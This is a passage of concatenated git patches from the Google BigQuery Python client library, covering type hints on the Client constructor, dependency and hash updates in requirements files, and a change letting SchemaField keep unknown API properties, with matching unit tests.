test_max_staleness_to_api_repr(self): + """Test max_staleness is correctly represented in API representation.""" + dataset = DatasetReference("test-project", "test_dataset") + table_ref = 
dataset.table("test_table") + table = self._make_one(table_ref) + # Set max_staleness + table.max_staleness = "1h" + # Convert to API representation + resource = table.to_api_repr() + self.assertEqual(resource.get("maxStaleness"), "1h") + class Test_row_from_mapping(unittest.TestCase, _SchemaBase): PROJECT = "prahj-ekt" From 40529de923e25c41c6728c121b9c82a042967ada Mon Sep 17 00:00:00 2001 From: Rin Arakaki Date: Wed, 11 Dec 2024 03:15:11 +0900 Subject: [PATCH 039/202] feat: add type hints to Client (#2044) * add type hints * Update client.py Moves import from being used solely during specific checks to being more universally available. * Update google/cloud/bigquery/client.py * Update client.py testing some minor changes to deal with mypy quirks * Update google/cloud/bigquery/client.py --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/client.py | 36 +++++++++++++++++++-------------- 1 file changed, 21 insertions(+), 15 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 97f239f7a..03ded93b1 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -44,6 +44,8 @@ import uuid import warnings +import requests + from google import resumable_media # type: ignore from google.resumable_media.requests import MultipartUpload # type: ignore from google.resumable_media.requests import ResumableUpload @@ -65,6 +67,7 @@ DEFAULT_BQSTORAGE_CLIENT_INFO = None # type: ignore +from google.auth.credentials import Credentials from google.cloud.bigquery._http import Connection from google.cloud.bigquery import _job_helpers from google.cloud.bigquery import _pandas_helpers @@ -126,6 +129,7 @@ _versions_helpers.PANDAS_VERSIONS.try_import() ) # mypy check fails because pandas import is outside module, there are type: ignore comments related to this + ResumableTimeoutType = Union[ None, float, Tuple[float, float] ] # for resumable media methods @@ -133,8 +137,6 @@ if typing.TYPE_CHECKING: # pragma: NO 
COVER # os.PathLike is only subscriptable in Python 3.9+, thus shielding with a condition. PathType = Union[str, bytes, os.PathLike[str], os.PathLike[bytes]] - import requests # required by api-core - _DEFAULT_CHUNKSIZE = 100 * 1024 * 1024 # 100 MB _MAX_MULTIPART_SIZE = 5 * 1024 * 1024 _DEFAULT_NUM_RETRIES = 6 @@ -231,15 +233,23 @@ class Client(ClientWithProject): def __init__( self, - project=None, - credentials=None, - _http=None, - location=None, - default_query_job_config=None, - default_load_job_config=None, - client_info=None, - client_options=None, + project: Optional[str] = None, + credentials: Optional[Credentials] = None, + _http: Optional[requests.Session] = None, + location: Optional[str] = None, + default_query_job_config: Optional[QueryJobConfig] = None, + default_load_job_config: Optional[LoadJobConfig] = None, + client_info: Optional[google.api_core.client_info.ClientInfo] = None, + client_options: Optional[ + Union[google.api_core.client_options.ClientOptions, Dict[str, Any]] + ] = None, ) -> None: + if client_options is None: + client_options = {} + if isinstance(client_options, dict): + client_options = google.api_core.client_options.from_dict(client_options) + # assert isinstance(client_options, google.api_core.client_options.ClientOptions) + super(Client, self).__init__( project=project, credentials=credentials, @@ -247,14 +257,10 @@ def __init__( _http=_http, ) - kw_args = {"client_info": client_info} + kw_args: Dict[str, Any] = {"client_info": client_info} bq_host = _get_bigquery_host() kw_args["api_endpoint"] = bq_host if bq_host != _DEFAULT_HOST else None client_universe = None - if client_options is None: - client_options = {} - if isinstance(client_options, dict): - client_options = google.api_core.client_options.from_dict(client_options) if client_options.api_endpoint: api_endpoint = client_options.api_endpoint kw_args["api_endpoint"] = api_endpoint From d4d39acb8574f0d06d4e490b859e5fe6b57d0d9e Mon Sep 17 00:00:00 2001 From: 
"gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Wed, 18 Dec 2024 02:40:17 +0800 Subject: [PATCH 040/202] chore(python): update dependencies in .kokoro/docker/docs (#2088) Source-Link: https://github.com/googleapis/synthtool/commit/e808c98e1ab7eec3df2a95a05331619f7001daef Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:8e3e7e18255c22d1489258d0374c901c01f9c4fd77a12088670cd73d580aa737 Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 +-- .kokoro/docker/docs/requirements.txt | 52 ++++++++++++++++++++++------ 2 files changed, 43 insertions(+), 13 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 6301519a9..26306af66 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:2ed982f884312e4883e01b5ab8af8b6935f0216a5a2d82928d273081fc3be562 -# created: 2024-11-12T12:09:45.821174897Z + digest: sha256:8e3e7e18255c22d1489258d0374c901c01f9c4fd77a12088670cd73d580aa737 +# created: 2024-12-17T00:59:58.625514486Z diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index 8bb076459..f99a5c4aa 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -2,11 +2,11 @@ # This file is autogenerated by pip-compile with Python 3.10 # by the following command: # -# pip-compile --allow-unsafe --generate-hashes requirements.in +# pip-compile --allow-unsafe --generate-hashes synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in # -argcomplete==3.5.1 \ - --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ - --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 +argcomplete==3.5.2 \ + --hash=sha256:036d020d79048a5d525bc63880d7a4b8d1668566b8a76daf1144c0bbe0f63472 \ + 
--hash=sha256:23146ed7ac4403b70bd6026402468942ceba34a6732255b9edf5b7354f68a6bb # via nox colorlog==6.9.0 \ --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ @@ -23,7 +23,7 @@ filelock==3.16.1 \ nox==2024.10.9 \ --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 - # via -r requirements.in + # via -r synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in packaging==24.2 \ --hash=sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759 \ --hash=sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f @@ -32,11 +32,41 @@ platformdirs==4.3.6 \ --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb # via virtualenv -tomli==2.0.2 \ - --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ - --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed +tomli==2.2.1 \ + --hash=sha256:023aa114dd824ade0100497eb2318602af309e5a55595f76b626d6d9f3b7b0a6 \ + --hash=sha256:02abe224de6ae62c19f090f68da4e27b10af2b93213d36cf44e6e1c5abd19fdd \ + --hash=sha256:286f0ca2ffeeb5b9bd4fcc8d6c330534323ec51b2f52da063b11c502da16f30c \ + --hash=sha256:2d0f2fdd22b02c6d81637a3c95f8cd77f995846af7414c5c4b8d0545afa1bc4b \ + --hash=sha256:33580bccab0338d00994d7f16f4c4ec25b776af3ffaac1ed74e0b3fc95e885a8 \ + --hash=sha256:400e720fe168c0f8521520190686ef8ef033fb19fc493da09779e592861b78c6 \ + --hash=sha256:40741994320b232529c802f8bc86da4e1aa9f413db394617b9a256ae0f9a7f77 \ + --hash=sha256:465af0e0875402f1d226519c9904f37254b3045fc5084697cefb9bdde1ff99ff \ + --hash=sha256:4a8f6e44de52d5e6c657c9fe83b562f5f4256d8ebbfe4ff922c495620a7f6cea \ + --hash=sha256:4e340144ad7ae1533cb897d406382b4b6fede8890a03738ff1683af800d54192 \ + 
--hash=sha256:678e4fa69e4575eb77d103de3df8a895e1591b48e740211bd1067378c69e8249 \ + --hash=sha256:6972ca9c9cc9f0acaa56a8ca1ff51e7af152a9f87fb64623e31d5c83700080ee \ + --hash=sha256:7fc04e92e1d624a4a63c76474610238576942d6b8950a2d7f908a340494e67e4 \ + --hash=sha256:889f80ef92701b9dbb224e49ec87c645ce5df3fa2cc548664eb8a25e03127a98 \ + --hash=sha256:8d57ca8095a641b8237d5b079147646153d22552f1c637fd3ba7f4b0b29167a8 \ + --hash=sha256:8dd28b3e155b80f4d54beb40a441d366adcfe740969820caf156c019fb5c7ec4 \ + --hash=sha256:9316dc65bed1684c9a98ee68759ceaed29d229e985297003e494aa825ebb0281 \ + --hash=sha256:a198f10c4d1b1375d7687bc25294306e551bf1abfa4eace6650070a5c1ae2744 \ + --hash=sha256:a38aa0308e754b0e3c67e344754dff64999ff9b513e691d0e786265c93583c69 \ + --hash=sha256:a92ef1a44547e894e2a17d24e7557a5e85a9e1d0048b0b5e7541f76c5032cb13 \ + --hash=sha256:ac065718db92ca818f8d6141b5f66369833d4a80a9d74435a268c52bdfa73140 \ + --hash=sha256:b82ebccc8c8a36f2094e969560a1b836758481f3dc360ce9a3277c65f374285e \ + --hash=sha256:c954d2250168d28797dd4e3ac5cf812a406cd5a92674ee4c8f123c889786aa8e \ + --hash=sha256:cb55c73c5f4408779d0cf3eef9f762b9c9f147a77de7b258bef0a5628adc85cc \ + --hash=sha256:cd45e1dc79c835ce60f7404ec8119f2eb06d38b1deba146f07ced3bbc44505ff \ + --hash=sha256:d3f5614314d758649ab2ab3a62d4f2004c825922f9e370b29416484086b264ec \ + --hash=sha256:d920f33822747519673ee656a4b6ac33e382eca9d331c87770faa3eef562aeb2 \ + --hash=sha256:db2b95f9de79181805df90bedc5a5ab4c165e6ec3fe99f970d0e302f384ad222 \ + --hash=sha256:e59e304978767a54663af13c07b3d1af22ddee3bb2fb0618ca1593e4f593a106 \ + --hash=sha256:e85e99945e688e32d5a35c1ff38ed0b3f41f43fad8df0bdf79f72b2ba7bc5272 \ + --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ + --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 # via nox -virtualenv==20.27.1 \ - --hash=sha256:142c6be10212543b32c6c45d3d3893dff89112cc588b7d0879ae5a1ec03a47ba \ - 
--hash=sha256:f11f1b8a29525562925f745563bfd48b189450f61fb34c4f9cc79dd5aa32a1f4 +virtualenv==20.28.0 \ + --hash=sha256:23eae1b4516ecd610481eda647f3a7c09aea295055337331bb4e6892ecce47b0 \ + --hash=sha256:2c9c3262bb8e7b87ea801d715fae4495e6032450c71d2309be9550e7364049aa # via nox From 887e126bd6128a7ca1d5a7f00abb50ce044d4c6f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 26 Dec 2024 08:58:58 -0800 Subject: [PATCH 041/202] chore(deps): bump jinja2 from 3.1.4 to 3.1.5 in /.kokoro (#2094) Bumps [jinja2](https://github.com/pallets/jinja) from 3.1.4 to 3.1.5. - [Release notes](https://github.com/pallets/jinja/releases) - [Changelog](https://github.com/pallets/jinja/blob/main/CHANGES.rst) - [Commits](https://github.com/pallets/jinja/compare/3.1.4...3.1.5) --- updated-dependencies: - dependency-name: jinja2 dependency-type: indirect ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- .kokoro/requirements.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.kokoro/requirements.txt b/.kokoro/requirements.txt index 006d8ef93..16db448c1 100644 --- a/.kokoro/requirements.txt +++ b/.kokoro/requirements.txt @@ -254,9 +254,9 @@ jeepney==0.8.0 \ # via # keyring # secretstorage -jinja2==3.1.4 \ - --hash=sha256:4a3aee7acbbe7303aede8e9648d13b8bf88a429282aa6122a993f0ac800cb369 \ - --hash=sha256:bc5dd2abb727a5319567b7a813e6a2e7318c39f4f487cfe6c89c6f9c7d25197d +jinja2==3.1.5 \ + --hash=sha256:8fefff8dc3034e27bb80d67c671eb8a9bc424c0ef4c0826edbff304cceff43bb \ + --hash=sha256:aba0f4dc9ed8013c424088f68a5c226f7d6097ed89b246d7749c2ec4175c6adb # via gcp-releasetool keyring==25.4.1 \ --hash=sha256:5426f817cf7f6f007ba5ec722b1bcad95a75b27d780343772ad76b17cb47b0bf \ From aaf1eb85ada95ab866be0199812ea7f5c7f50766 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Fri, 27 Dec 2024 16:55:01 -0600 Subject: [PATCH 
042/202] feat: preserve unknown fields from the REST API representation in `SchemaField` (#2097) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: preserve unknown fields from the REST API representation in `SchemaField` * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * remove unnecessary variable * remove unused private method * fix pytype --------- Co-authored-by: Owl Bot --- google/cloud/bigquery/schema.py | 82 +++++++++--------------------- tests/unit/job/test_load_config.py | 29 +++++++++-- tests/unit/test_schema.py | 37 +++++++++++--- tests/unit/test_table.py | 32 ++++++++++-- 4 files changed, 105 insertions(+), 75 deletions(-) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index f5b03cbef..b062396cf 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -16,8 +16,9 @@ import collections import enum -from typing import Any, Dict, Iterable, Optional, Union, cast +from typing import Any, cast, Dict, Iterable, Optional, Union +from google.cloud.bigquery import _helpers from google.cloud.bigquery import standard_sql from google.cloud.bigquery.enums import StandardSqlTypeNames @@ -203,15 +204,8 @@ def __init__( self._properties["rangeElementType"] = {"type": range_element_type} if isinstance(range_element_type, FieldElementType): self._properties["rangeElementType"] = range_element_type.to_api_repr() - - self._fields = tuple(fields) - - @staticmethod - def __get_int(api_repr, name): - v = api_repr.get(name, _DEFAULT_VALUE) - if v is not _DEFAULT_VALUE: - v = int(v) - return v + if fields: # Don't set the property if it's not set. 
+ self._properties["fields"] = [field.to_api_repr() for field in fields] @classmethod def from_api_repr(cls, api_repr: dict) -> "SchemaField": @@ -225,43 +219,19 @@ def from_api_repr(cls, api_repr: dict) -> "SchemaField": Returns: google.cloud.bigquery.schema.SchemaField: The ``SchemaField`` object. """ - field_type = api_repr["type"].upper() - - # Handle optional properties with default values - mode = api_repr.get("mode", "NULLABLE") - description = api_repr.get("description", _DEFAULT_VALUE) - fields = api_repr.get("fields", ()) - policy_tags = api_repr.get("policyTags", _DEFAULT_VALUE) + placeholder = cls("this_will_be_replaced", "PLACEHOLDER") - default_value_expression = api_repr.get("defaultValueExpression", None) + # Note: we don't make a copy of api_repr because this can cause + # unnecessary slowdowns, especially on deeply nested STRUCT / RECORD + # fields. See https://github.com/googleapis/python-bigquery/issues/6 + placeholder._properties = api_repr - if policy_tags is not None and policy_tags is not _DEFAULT_VALUE: - policy_tags = PolicyTagList.from_api_repr(policy_tags) - - if api_repr.get("rangeElementType"): - range_element_type = cast(dict, api_repr.get("rangeElementType")) - element_type = range_element_type.get("type") - else: - element_type = None - - return cls( - field_type=field_type, - fields=[cls.from_api_repr(f) for f in fields], - mode=mode.upper(), - default_value_expression=default_value_expression, - description=description, - name=api_repr["name"], - policy_tags=policy_tags, - precision=cls.__get_int(api_repr, "precision"), - scale=cls.__get_int(api_repr, "scale"), - max_length=cls.__get_int(api_repr, "maxLength"), - range_element_type=element_type, - ) + return placeholder @property def name(self): """str: The name of the field.""" - return self._properties["name"] + return self._properties.get("name", "") @property def field_type(self): @@ -270,7 +240,10 @@ def field_type(self): See: 
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#TableFieldSchema.FIELDS.type """ - return self._properties["type"] + type_ = self._properties.get("type") + if type_ is None: # Shouldn't happen, but some unit tests do this. + return None + return cast(str, type_).upper() @property def mode(self): @@ -279,7 +252,7 @@ def mode(self): See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#TableFieldSchema.FIELDS.mode """ - return self._properties.get("mode") + return cast(str, self._properties.get("mode", "NULLABLE")).upper() @property def is_nullable(self): @@ -299,17 +272,17 @@ def description(self): @property def precision(self): """Optional[int]: Precision (number of digits) for the NUMERIC field.""" - return self._properties.get("precision") + return _helpers._int_or_none(self._properties.get("precision")) @property def scale(self): """Optional[int]: Scale (digits after decimal) for the NUMERIC field.""" - return self._properties.get("scale") + return _helpers._int_or_none(self._properties.get("scale")) @property def max_length(self): """Optional[int]: Maximum length for the STRING or BYTES field.""" - return self._properties.get("maxLength") + return _helpers._int_or_none(self._properties.get("maxLength")) @property def range_element_type(self): @@ -329,7 +302,7 @@ def fields(self): Must be empty unset if ``field_type`` is not 'RECORD'. """ - return self._fields + return tuple(_to_schema_fields(self._properties.get("fields", []))) @property def policy_tags(self): @@ -345,15 +318,10 @@ def to_api_repr(self) -> dict: Returns: Dict: A dictionary representing the SchemaField in a serialized form. """ - answer = self._properties.copy() - - # If this is a RECORD type, then sub-fields are also included, - # add this to the serialized representation. - if self.field_type.upper() in _STRUCT_TYPES: - answer["fields"] = [f.to_api_repr() for f in self.fields] - - # Done; return the serialized dictionary. 
- return answer + # Note: we don't make a copy of _properties because this can cause + # unnecessary slowdowns, especially on deeply nested STRUCT / RECORD + # fields. See https://github.com/googleapis/python-bigquery/issues/6 + return self._properties def _key(self): """A tuple key that uniquely describes this field. @@ -389,7 +357,7 @@ def _key(self): self.mode.upper(), # pytype: disable=attribute-error self.default_value_expression, self.description, - self._fields, + self.fields, policy_tags, ) diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index becf3e959..3a681c476 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -12,6 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. +import copy import warnings import pytest @@ -571,16 +572,34 @@ def test_schema_setter_valid_mappings_list(self): config._properties["load"]["schema"], {"fields": [full_name_repr, age_repr]} ) - def test_schema_setter_invalid_mappings_list(self): + def test_schema_setter_allows_unknown_properties(self): config = self._get_target_class()() schema = [ - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - {"name": "age", "typeoo": "INTEGER", "mode": "REQUIRED"}, + { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + "someNewProperty": "test-value", + }, + { + "name": "age", + # Note: This type should be included, too. Avoid client-side + # validation, as it could prevent backwards-compatible + # evolution of the server-side behavior. + "typo": "INTEGER", + "mode": "REQUIRED", + "anotherNewProperty": "another-test", + }, ] - with self.assertRaises(Exception): - config.schema = schema + # Make sure the setter doesn't mutate schema. + expected_schema = copy.deepcopy(schema) + + config.schema = schema + + # _properties should include all fields, including unknown ones. 
+ assert config._properties["load"]["schema"]["fields"] == expected_schema def test_schema_setter_unsetting_schema(self): from google.cloud.bigquery.schema import SchemaField diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index b17cd0281..4b0b28158 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -12,14 +12,16 @@ # See the License for the specific language governing permissions and # limitations under the License. -from google.cloud import bigquery -from google.cloud.bigquery.standard_sql import StandardSqlStructType -from google.cloud.bigquery.schema import PolicyTagList +import copy import unittest from unittest import mock import pytest +from google.cloud import bigquery +from google.cloud.bigquery.standard_sql import StandardSqlStructType +from google.cloud.bigquery.schema import PolicyTagList + class TestSchemaField(unittest.TestCase): @staticmethod @@ -821,13 +823,32 @@ def test_schema_fields_sequence(self): result = self._call_fut(schema) self.assertEqual(result, schema) - def test_invalid_mapping_representation(self): + def test_unknown_properties(self): schema = [ - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - {"name": "address", "typeooo": "STRING", "mode": "REQUIRED"}, + { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + "someNewProperty": "test-value", + }, + { + "name": "age", + # Note: This type should be included, too. Avoid client-side + # validation, as it could prevent backwards-compatible + # evolution of the server-side behavior. + "typo": "INTEGER", + "mode": "REQUIRED", + "anotherNewProperty": "another-test", + }, ] - with self.assertRaises(Exception): - self._call_fut(schema) + + # Make sure the setter doesn't mutate schema. 
+ expected_schema = copy.deepcopy(schema) + + result = self._call_fut(schema) + + for api_repr, field in zip(expected_schema, result): + assert field.to_api_repr() == api_repr def test_valid_mapping_representation(self): from google.cloud.bigquery.schema import SchemaField diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 3824da226..e9d461e9d 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -12,6 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. +import copy import datetime import logging import re @@ -711,14 +712,35 @@ def test_schema_setter_valid_fields(self): table.schema = [full_name, age] self.assertEqual(table.schema, [full_name, age]) - def test_schema_setter_invalid_mapping_representation(self): + def test_schema_setter_allows_unknown_properties(self): dataset = DatasetReference(self.PROJECT, self.DS_ID) table_ref = dataset.table(self.TABLE_NAME) table = self._make_one(table_ref) - full_name = {"name": "full_name", "type": "STRING", "mode": "REQUIRED"} - invalid_field = {"name": "full_name", "typeooo": "STRING", "mode": "REQUIRED"} - with self.assertRaises(Exception): - table.schema = [full_name, invalid_field] + schema = [ + { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + "someNewProperty": "test-value", + }, + { + "name": "age", + # Note: This type should be included, too. Avoid client-side + # validation, as it could prevent backwards-compatible + # evolution of the server-side behavior. + "typo": "INTEGER", + "mode": "REQUIRED", + "anotherNewProperty": "another-test", + }, + ] + + # Make sure the setter doesn't mutate schema. + expected_schema = copy.deepcopy(schema) + + table.schema = schema + + # _properties should include all fields, including unknown ones. 
+ assert table._properties["schema"]["fields"] == expected_schema def test_schema_setter_valid_mapping_representation(self): from google.cloud.bigquery.schema import SchemaField From 6cbd5c0a49a5f6e289abc747559b3963933fac90 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 2 Jan 2025 23:46:50 +0100 Subject: [PATCH 043/202] chore(deps): update all dependencies (#2096) * chore(deps): update all dependencies * pin attrs===24.2.0 for python 3.7 * pin urllib3===2.2.3 for python 3.8 * pin matplotlib===3.9.2 for python 3.9 --------- Co-authored-by: Lingqing Gan --- .kokoro/docker/docs/requirements.txt | 6 +++--- samples/desktopapp/requirements-test.txt | 4 ++-- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 24 +++++++++++++----------- samples/magics/requirements-test.txt | 4 ++-- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements-test.txt | 4 ++-- samples/notebooks/requirements.txt | 5 +++-- samples/snippets/requirements-test.txt | 4 ++-- 9 files changed, 29 insertions(+), 26 deletions(-) diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index f99a5c4aa..fb6ffa272 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -4,9 +4,9 @@ # # pip-compile --allow-unsafe --generate-hashes synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in # -argcomplete==3.5.2 \ - --hash=sha256:036d020d79048a5d525bc63880d7a4b8d1668566b8a76daf1144c0bbe0f63472 \ - --hash=sha256:23146ed7ac4403b70bd6026402468942ceba34a6732255b9edf5b7354f68a6bb +argcomplete==3.5.3 \ + --hash=sha256:2ab2c4a215c59fd6caaff41a869480a23e8f6a5f910b266c1808037f4e375b61 \ + --hash=sha256:c12bf50eded8aebb298c7b7da7a5ff3ee24dffd9f5281867dfe1424b58c55392 # via nox colorlog==6.9.0 \ --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 
1640e1a95..827b02dcf 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.4.0 +google-cloud-testutils==1.5.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 1ccebd9cd..ef38acb4f 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index edf5a24b6..ab73dbe87 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,21 +1,22 @@ -attrs==24.2.0 -certifi==2024.8.30 +attrs===24.2.0; python_version == '3.7' +attrs==24.3.0; python_version >= '3.8' +certifi==2024.12.14 cffi===1.15.1; python_version == '3.7' cffi==1.17.1; python_version >= '3.8' -charset-normalizer==3.4.0 -click==8.1.7 +charset-normalizer==3.4.1 +click==8.1.8 click-plugins==1.1.1 cligj==0.7.2 dataclasses==0.8; python_version < '3.7' db-dtypes==1.3.1 Fiona===1.9.6; python_version == '3.7' Fiona==1.10.1; python_version >= '3.8' -geojson==3.1.0 +geojson==3.2.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.23.0 -google-auth==2.36.0 +google-api-core==2.24.0 +google-auth==2.37.0 google-cloud-bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 google-cloud-core==2.4.1 @@ -24,7 +25,7 @@ google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.66.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.68.0; python_version >= '3.8' +grpcio==1.68.1; python_version >= '3.8' idna==3.10 
munch==4.0.0 mypy-extensions==1.0.0 @@ -44,7 +45,7 @@ pyasn1-modules==0.4.1; python_version >= '3.8' pycparser===2.21; python_version == '3.7' pycparser==2.22; python_version >= '3.8' pyparsing===3.1.4; python_version < '3.9' -pyparsing==3.2.0; python_version >= '3.9' +pyparsing==3.2.1; python_version >= '3.9' python-dateutil==2.9.0.post0 pytz==2024.2 PyYAML===6.0.1; python_version == '3.7' @@ -53,9 +54,10 @@ requests==2.31.0; python_version == '3.7' requests==2.32.3; python_version >= '3.8' rsa==4.9 Shapely==2.0.6 -six==1.16.0 +six==1.17.0 typing-extensions===4.7.1; python_version == '3.7' typing-extensions==4.12.2; python_version >= '3.8' typing-inspect==0.9.0 urllib3===1.26.18; python_version == '3.7' -urllib3==2.2.3; python_version >= '3.8' +urllib3===2.2.3; python_version == '3.8' +urllib3==2.3.0; python_version >= '3.9' diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 1640e1a95..827b02dcf 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.4.0 +google-cloud-testutils==1.5.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 543d9a512..87efa3dec 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,4 +1,4 @@ -bigquery_magics==0.4.0 +bigquery_magics==0.5.0 db-dtypes==1.3.1 google.cloud.bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 1640e1a95..827b02dcf 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.4.0 +google-cloud-testutils==1.5.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; 
python_version >= '3.8' mock==5.1.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index ca8a0a13e..77103a338 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,4 +1,4 @@ -bigquery-magics==0.4.0 +bigquery-magics==0.5.0 db-dtypes==1.3.1 google-cloud-bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 @@ -7,7 +7,8 @@ ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' matplotlib===3.5.3; python_version == '3.7' matplotlib===3.7.4; python_version == '3.8' -matplotlib==3.9.2; python_version >= '3.9' +matplotlib===3.9.2; python_version == '3.9' +matplotlib==3.10.0; python_version >= '3.10' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' pandas==2.2.3; python_version >= '3.9' diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index bb0b2a6bf..077e465cf 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" -google-cloud-testutils==1.4.0 +google-cloud-testutils==1.5.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 From cc49760de1bab7a2e45fe9e485daacc4eebae1ef Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 3 Jan 2025 23:01:48 +0100 Subject: [PATCH 044/202] chore(deps): update dependency virtualenv to v20.28.1 